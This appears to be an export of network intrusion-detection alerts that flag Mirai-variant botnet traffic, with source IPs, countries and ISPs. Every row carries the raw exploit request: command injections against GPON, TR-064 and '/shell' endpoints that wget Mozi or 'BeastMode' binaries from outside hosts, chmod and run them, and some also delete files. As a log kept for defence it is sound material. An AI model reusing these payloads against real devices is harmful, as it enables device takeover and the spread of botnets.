"Nov 3, 2020 @ 14:53:25.000","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://27.197.17.10:42974/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0","27.197.17.10",37956,China,,"/GponForm/diag_Form?images/","CNCGROUP China169 Backbone",,4837 | |
"Nov 3, 2020 @ 12:46:32.796","ET SCAN Mirai Variant User-Agent (Inbound)",,"76.66.194.124",45317,Canada,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","Bell Canada",Montreal,577 | |
"Nov 3, 2020 @ 12:45:40.126","ET SCAN Mirai Variant User-Agent (Inbound)",,"156.211.174.220",48549,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+185.239.242.121/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+185.239.242.121/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",Bilbeis,8452 | |
"Nov 3, 2020 @ 05:58:19.853","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://125.43.94.31:36438/Mozi.m+-O+->/tmp/gpon80;s","125.43.94.31",42953,China,"POST /GponForm/diag_Form?images/ HTTP/1.1 | |
Host: 127.0.0.1:80 | |
Connection: keep-alive | |
Accept-Encoding: gzip, deflate | |
Accept: */* | |
User-Agent: Hello, World | |
Content-Length: 118 | |
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://125.43.94.31:36438/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0","/GponForm/diag_Form?images/","CNCGROUP China169 Backbone",Luoyang,4837 | |
"Nov 2, 2020 @ 20:01:22.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://211.248.241.116:50600/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","211.248.241.116",32974,"South Korea","POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:5555 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://211.248.241.116:50600/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","Korea Telecom","Jongno-gu",4766 | |
"Nov 2, 2020 @ 19:19:03.812","ET SCAN Mirai Variant User-Agent (Inbound)",,"41.42.41.41",34223,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+185.239.242.121/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+185.239.242.121/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",,8452 | |
"Nov 2, 2020 @ 18:01:20.778","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://61.52.49.50:34042/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","61.52.49.50",56168,China,"POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:7574 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://61.52.49.50:34042/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","CNCGROUP China169 Backbone",Zhengzhou,4837 | |
"Nov 2, 2020 @ 17:20:08.176","ET SCAN Mirai Variant User-Agent (Inbound)",,"116.92.212.66",40698,"Hong Kong","GET /shell?cd+/tmp;rm+-rf+*;wget+198.98.62.137/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+198.98.62.137/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","8/F KITEC",Central,2706 | |
"Nov 2, 2020 @ 14:31:48.000","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://182.58.207.201:41876/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0","182.58.207.201",41888,India,,"/GponForm/diag_Form?images/","Mahanagar Telephone Nigam Limited",Mumbai,17813 | |
"Nov 2, 2020 @ 12:27:22.301","ET SCAN Mirai Variant User-Agent (Inbound)",,"27.184.26.136",48052,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws",Chinanet,Shijiazhuang,4134 |